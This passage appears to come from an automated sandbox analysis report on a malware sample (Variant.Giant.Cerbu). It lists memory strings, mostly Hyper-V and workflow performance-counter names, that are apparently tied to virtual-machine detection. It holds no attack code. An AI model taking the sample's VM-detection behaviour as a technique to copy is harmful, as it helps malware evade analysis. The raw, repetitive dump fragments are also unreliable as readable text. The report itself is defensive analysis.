Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes?
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor0&
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipesL
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1665045921.00000245B110B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Swi
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine BusA
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V HypervisorD0nf
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653708046.00000245AF59A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table All
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionr
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisorn
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1657405472.00000245AF5A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1656667178.00000245AF5A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976H
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisorrD
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partitionl5
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor0Y9
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partitionem)
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes_@z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical ProcessorllKAw
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid PartitionY
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processorexe
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1664616460.00000245B0E61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processor.syse
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionll
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653708046.00000245AF59A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2377021004.00000236AB074000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorc.sysO
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor.
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes8
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: SgrmBroker.exe, 00000018.00000003.2375167971.00000236AB080000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisors(x'bs
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServicefwP
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition1
Source: SgrmBroker.exe, 00000018.00000003.2374064581.00000236AB07F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V 